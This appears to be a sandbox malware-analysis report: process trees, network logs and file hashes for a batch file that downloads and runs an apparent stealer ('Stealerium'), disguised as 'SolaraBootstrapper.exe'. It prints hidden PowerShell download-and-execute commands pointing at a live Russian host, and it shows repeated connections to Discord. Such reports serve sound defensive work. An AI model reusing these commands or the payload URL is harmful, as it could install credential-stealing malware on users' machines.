"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1352 /prefetch:8
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\build.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process cmd -ArgumentList '/c start \"\" \"\"\"C:\Users\Admin\AppData\Local\build.exe\"\"\"' "
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" """C:\Users\Admin\AppData\Local\build.exe"""
C:\Users\Admin\AppData\Local\build.exe
"""C:\Users\Admin\AppData\Local\build.exe"""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1751.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 3284
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb430ab58,0x7fffb430ab68,0x7fffb430ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3052 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3960 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4564 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5204 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\local\SolaraBootstrapper.exe
C:\Users\Admin\AppData\local\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4EA8.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 3248
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1868 --field-trial-handle=1948,i,486704024449183633,11319693822572622246,131072 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | a0995400.xsph.ru | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | 58.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a0995400.xsph.ru | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b704c9ca0493bd4548ac9c69dc4a4f27 |
| SHA1 | a3e5e54e630dabe55ca18a798d9f5681e0620ba7 |
| SHA256 | 2ebd5229b9dc642afba36a27c7ac12d90196b1c50985c37e94f4c17474e15411 |
| SHA512 | 69c8116fb542b344a8c55e2658078bd3e0d3564b1e4c889b072dbc99d2b070dacbc4394dedbc22a4968a8cf9448e71f69ec71ded018c1bacc0e195b3b3072d32 |
\??\pipe\LOCAL\crashpad_4796_HWJDCVRLADJSKLXG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 477462b6ad8eaaf8d38f5e3a4daf17b0 |
| SHA1 | 86174e670c44767c08a39cc2a53c09c318326201 |
| SHA256 | e6bbd4933b9baa1df4bb633319174de07db176ec215e71c8568d27c5c577184d |
| SHA512 | a0acc2ef7fd0fcf413572eeb94d1e38aa6a682195cc03d6eaaaa0bc9e5f4b2c0033da0b835f4617aebc52069d0a10b52fc31ed53c2fe7943a480b55b7481dd4e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 468131467c0a2bb6cbe9c80a997b9056 |
| SHA1 | 2b6b30cc99c026e119a108024c3f05f8899fd36c |
| SHA256 | 1771fa0ceaff9bdea400db6cb0603426fd5c4864cbc6d31a3796304700821b23 |
| SHA512 | 06352ca755527c2b974aadaa71a5b1d69fe6f089917c03f48c9dc00d850166b5070537784bfb9707b64993a052452acc0506ef05ce77dc335bc4469bed29a9d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2779633d355317485c5a725eca887615 |
| SHA1 | 318d23a4b709d80d69105f0ae57d4e28c7417ebc |
| SHA256 | be81dadf74dcce445363178beec2550dee1f4e1bb1c59fd8f04dc7ff0f6f939c |
| SHA512 | d6042851fc6fd3d733b015d77f43454a8ad6de88da462888c258dd34b0575b734f765db2a47d455d6ff14b0669dea87206c9df6fb9cc94796f8324de833d03e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8b6c97a1fd0a2f5a2b7b49a375ded4b1 |
| SHA1 | 155ee995a7c30d7bbe0a1dbdebf037d0ebe531da |
| SHA256 | 54b21b84067dde88644c7629044316281a9b2a79427582bd3c621d8e5e2b6943 |
| SHA512 | 3e9575ac7d95bd48682df0e1263f5b8ba267db51a3321d167428db24d868beb221c2da585e42895db3d88b0ce386972bd6fa68f0c8cc04f74bac814c912c02f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4f79f09e6c46a34795d0cb225b2784aa |
| SHA1 | be14318cf548185fb95ff6b73d418f291c58c8df |
| SHA256 | 21b076c1c170e9cdf3dafb2cadee6081dbd4024884bbbd70f79f362e13449b7b |
| SHA512 | 6f8b12833113643044153f12697fe7abd361521de01a6281c3261cbc4978a5cc69b4504ca0dc1bb64c1dd6301fb8e03ee34ba13210114c0be510682217c3cd54 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d07ae6e61d1e39191af1042cf7b2f2df |
| SHA1 | 0e4db3ef60e0e59b3579cc06de1698a3fa79cf63 |
| SHA256 | efc645f52332e20889d8d2b5c668e9f4fd44e180601a5d37c809b3526ee5e5ed |
| SHA512 | dbd39e6953690d747c30009361ef9ef720b1175c1d167ad918549ed02a1db0920243c54fce4a33a8337398e9e0bbd38c9c77b398333c8855ebd5f544744f25df |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | 69b17f61229dcacabd1e0810e00c95fc |
| SHA1 | 1a39e2c8b916f4438d707c2f678189bd9e216b5d |
| SHA256 | 112362d70c14789fae50d0122903229d657b28b9396c9bb786149dc21bf44ba2 |
| SHA512 | 812fb9504a79a57a06571d52bb662556dcbe5e927af72761569ba3434358c3ffb0f66e7c49da488a0d22961bb6ebe3af0e1771c5338ad99c61fdad01906c268c |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xmc0nyf1.mbu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4856-102-0x000001EA9E980000-0x000001EA9E9A2000-memory.dmp
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
| MD5 | 4fdee2f1b5d9fba50d17fa7acc098681 |
| SHA1 | 6c7008679dc6b90f29d4be48b9908aa8dec5af35 |
| SHA256 | dabc05fbecee7566ddf88519368e6602d1eeab679734a3830f99e083acc775d2 |
| SHA512 | 50972f5afc3f324c85a178029812257765be5ae600127e873b8ef3a934e73e3475204d2cc4cf3554ac3cf3c9debf4d61067d24ef861142194fea1941129c94b8 |
memory/800-126-0x0000000000510000-0x00000000006A2000-memory.dmp
memory/800-127-0x0000000005060000-0x00000000050C6000-memory.dmp
memory/800-130-0x0000000005480000-0x0000000005512000-memory.dmp
memory/800-131-0x0000000005510000-0x0000000005536000-memory.dmp
memory/800-132-0x0000000002BE0000-0x0000000002BE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp60C8.tmp.bat
| MD5 | cfbf341ada7ba1772d71902c08ac15ca |
| SHA1 | ac52e2032b5e249e9150b502ade1cf5df4dec5ad |
| SHA256 | 63c56f52c3e9e7bcb713574a184a894a97815588c6ca8bcca7fcd0510ee8a41b |
| SHA512 | dc86f370370e9c08b0d7cd784f95eb177cb5c4b15b7fff68d79a66537c67f45687ebe6a531af1af54c16f3d1f3c1c044d8ab7b0b6fd8a7da8bc419bef412aed9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 00a455d9d155394bfb4b52258c97c5e5 |
| SHA1 | 2761d0c955353e1982a588a3df78f2744cfaa9df |
| SHA256 | 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed |
| SHA512 | 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0fa606310b7897483d1f69151782a289 |
| SHA1 | bb0293f564ac6a3de63e601c927c3572d2b698d9 |
| SHA256 | 2113f144a235b4b66bc2a305954d42969685318040b5e50a7a1e414714dc3690 |
| SHA512 | 450d17c12c0d41bac97f195f21ab3763050b002ddca0520cda682b43c1fe6973bd3c1d7b31bbbb7304b67b4382cd04fe840ec6eb42e344480e64d69cbcedab16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5a29476ef045055366d75f925bc2734e |
| SHA1 | 1e5bf8b1c2d61a963eee6579e1703c44055d5d5e |
| SHA256 | 1f76c806526d9dcbeb3b7706e2510ef9a8b40770276b9841927320fa503d44b5 |
| SHA512 | 28b4ea187a16b220b1c61751874ae9d7b9105be64a011b0e985b9adccb10b0ef18337575944c20ae9dad21039cd80b9dc2f6880a96cfed7571ef0381f79ad4e6 |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | 454f07b07be2e7b3c1d8713981c1acb2 |
| SHA1 | 763e94ba632b83afbc1c0cf4c78c4db90b6e333d |
| SHA256 | b41e8468c41df892c7546dd36cf844950d3167519c291acbca9902422c955df4 |
| SHA512 | f687f45c0372ed6f7d1d7db8fcd8c80915029251b7ce14f357e982293b8f543334d03cd0952b975f8a17784ae033ec13fb714f3135bbc963ea08ead79f5132bf |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a5c074e56305e761d7cbc42993300e1c |
| SHA1 | 39b2e23ba5c56b4f332b3607df056d8df23555bf |
| SHA256 | e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953 |
| SHA512 | c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8 |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | 72b783ab1a553d3c84c8528518722b0a |
| SHA1 | 1be99ac7660f898307e1a96f44f3d0626674384e |
| SHA256 | 7ad5ab5793da461b91da50985332e2390d1e0e2973eba984ea597951f785c08a |
| SHA512 | ab02a6244665e7f443e133f18196740d40eac0b76ed5ee69eb8ee505b0e3b4a441a926a764822dc762cbe74dd2da9f38dc395c8608fa04b0f5fe6f108ba704d7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5fc00d57e0c3ec22b72bb7f4269cd17d |
| SHA1 | 9b18d2a725fca44cc45aa5919d40840e38451de9 |
| SHA256 | 7a78eceaf9325df93ece2bb7b51d1e885f849c32d804ebbd0e4df5bf3ec64161 |
| SHA512 | bf088db26fd27d682d0f3f2c61fb04b558e3355405853d153d4a00c43c1ff42d2b8eb76578728e67cb2dba422dc474f849d4639dd1b5df436cef92dec79f6a2e |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | bf4d2a2444a78f2c8b0f754de0ba1a2e |
| SHA1 | 4dc5a297e5da06289aa8e26391dd18a215a9f2e9 |
| SHA256 | 41a2f46f16e4a2644fd957e17d740115acfeefa40cebe561d239bd48540e7d02 |
| SHA512 | 8b1bb73a4a7074659b660a443cd27974ce52e360d3c827974d1c8f1d422ba14168969d29f4faff1961046a2cf620eb2930f0f21b72b3f7060a8945ed8d67e8aa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da61bec5b8afda0bf3db5f88fe3f9409 |
| SHA1 | b4a1402a9b64b9e662a8149ee1ac5c4e85f40055 |
| SHA256 | 355d7c2cd300c98b77e6b47614cd9c6e6584a6dacc7b821c70a6f8e42e230225 |
| SHA512 | 958086b0fabf4c25e90d1875bc409432fa4a34f4399b60416fcaad8c54c8c6d21be3b6a771e6f7f558e6e018d74bae33261a67e143c85bb5668e38a32dc8b156 |
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
| MD5 | 6627adf7167ee571e8fd6c8b1a0e8ae3 |
| SHA1 | 03b9112660ee73c59d84e219f15bf24ae9df48db |
| SHA256 | 6c5935bcddaa1d4f809487f66db758e892cc0a7fd7704d138904bc879644ea1f |
| SHA512 | e05896a6e0d09d4dafeb2467395ca06ae1e728a4aa079041dea82940caeb71646984604fdeea482748423b10257b8462db4f573682f9f719939143fdb5691c60 |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | 780bfd22ffdea8b6273a2492885e0139 |
| SHA1 | e7c7ab597ce10723e0bbbc14ea56992a1e47a083 |
| SHA256 | d68fa5180d84e0214982a95bb7d49d71986d7861991e54c09556baed757dd0d0 |
| SHA512 | 639a12d9550e78d905bc530c3314a91efe188bb05cdbca097c0d3f5b47c956c83829d244c2094e63cfe3754eda7f451172d147c78ba08851c010f2126f1ff23a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f385c09cfc7760e52a68a50593229963 |
| SHA1 | b08997fec411b1cb89bb4f84de73cb7bb6004652 |
| SHA256 | 44c39e177f78e1a9055ab0ef2ef82b27b1871f4cc0099447a7e6c94b730d8378 |
| SHA512 | fb99811674266b3dcdaa7a6525dd049e57b5cb4aefacd68192268593269af0b86535f769ec2f5bca6c17ea2f926447f5c39dedf8a13ff7fb758241935da4605a |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | de6ee4f5377f8b4de3d277f391aee8df |
| SHA1 | 6133153499293deaee1eb89a4ebbf94d45f368bf |
| SHA256 | 597b8563c8acbd798af9042d4837d56d361d00dfe0c86a391915caea45f654de |
| SHA512 | 81a2a067453709541f2563900af2023832d8326ceeda1d4cfd7778e397d5068bc91a35b9dc9772e8fa2d0410d561be88a40f809147137bae18b55635b3df5ebd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d05f0de005303c188bc415827550d910 |
| SHA1 | 2f0a5721d5b9d9693d3b227261131e5623fd08c5 |
| SHA256 | da4a40d26e17b860a8619b57934a5f5eb1ecf5da2c10d91db7ae533318f5828f |
| SHA512 | 3c664d40ea3ce0d3a880f50a217a91adde3c97217773fc67a735255677b11f194e484aec7d85c4abc7625ba5160d585eee97f881aeb72d7e843eb0d730f80a0f |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | a42795ec2d49ba142a2ebc5f002f32c4 |
| SHA1 | db7b4971b1aa5fad8592e15f53732d62bbef8759 |
| SHA256 | c3d3dfe0d808eb5b0160acf48a5fea70b1a7218db07d86ba4b52e17e2e6b4d5b |
| SHA512 | 2b1fa72c53095c08b8dcbee7916c50a1bc6943dad1113b41fd2b0ef8db5af0e13686c1bf69c4d2825561eeb49c6e21c413a466ae3a497d8114d4837eeb6879eb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dee4b479ca72627dfc2ed19301e40940 |
| SHA1 | 045305f459eb4ff502f89f839499477eeb9151a5 |
| SHA256 | 87fb2911d17218d2b8e9b8fd05f0868dc0076f7e0bdb8f17cf080d34c88a4a06 |
| SHA512 | 590b7e8d00df036e303e7c8645a792230aa207541b199851b14d1170e69974965f2f2b912c553fbd93415020f34d97e04569f37cabd7aed55abe3a500acf242e |
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log
| MD5 | 339ae79ad5c5b3e8a2bb269cdf51ca2f |
| SHA1 | 7fee560bb2f07625f4a123e42dd0428101a69da5 |
| SHA256 | aeb0ebb7ff9742f6de8b2aefa415fce3fc3ef72fd31d7087ad5adfa0164a480e |
| SHA512 | 914335f0605f083bad59fbdcfe35d03f0a5dd993459a453bb8f201b48a48ad4984962327fb826ffd6e50b27580d29290968725bb9deea462acbe00370ad467c4 |
C:\Users\Admin\AppData\Local\Temp\tmp9C15.tmp.bat
| MD5 | bf6ca114d36825cdf23f7c3282db1367 |
| SHA1 | efa904a3c7f2131a33bb7907f9a490d590edb1a7 |
| SHA256 | 8f25b1de8c377bc9ec628c0d8847603fe907209bd5a494ab43c7a65f1013d438 |
| SHA512 | 095b9e9db4df1bb4c4b930a11c26230f5f8f0086e75b4d6670226e4cc7a4df86afa57d983bbe80b7cfd3b05b8028297d7d7481e373ccc4835d50c01f0fd2c9ef |
C:\Users\Admin\Desktop\sorka.bat
| MD5 | 3646d29ae3f5da57fa8fe623ee8bcc74 |
| SHA1 | ef4276a34999cb5dbd568d57851bf200444ee1c0 |
| SHA256 | 2a41b9d59c9126217cf38fd01b7f630af035bd3d49c33cb1a12fcd3f83e73213 |
| SHA512 | b31aa37dff3bd53d06ae43e70b5f51a4ada0698692be23c6f314143aefe56b8f5d51429f4cd8eeb26a94b441ca8dd594fb87e7d9a2dbf128e8ff5ad5d41f5f9f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2419d068e09423d5e7edec9bb8010870 |
| SHA1 | 445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba |
| SHA256 | d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac |
| SHA512 | 053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264 |
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log
| MD5 | bf7add40a57c1ce49135a69266d8d675 |
| SHA1 | 74bf824f0fef1710cb6fe06375ca57120b22e567 |
| SHA256 | 3fdeb53a0a402ec53995bb1bbaf40d60232ffe30ddb1b3ec5005e9c68ef3f0fe |
| SHA512 | 013bef9c4ec7da98c741f3df9a8194491dd6548478a72741dc266158b2437656341ac0b56c2cc63fa6d735bc1410cf14c0e53c60c47fb4d3f45aea01812a7b16 |
C:\Users\Admin\AppData\Local\Temp\tmp17FC.tmp.bat
| MD5 | 69a8726e7291fc5ee256d91699037655 |
| SHA1 | bfe3e11c0875cf718c2589f68eb72316bfa2f86b |
| SHA256 | d0bdd98b0078e2ccaaf60bfa60ac3f1eec12eeb5809befd70f148234a1140d73 |
| SHA512 | 72621e9a3308ca8f04edc806dd7f8ac247ee060ad47f5d4a276f0e4f7ca35cb6e3846e94804450fbdc1f815703d43b8c5e40da6fd9658ea99850f5832288e49a |
C:\Users\Admin\Desktop\sorka.bat
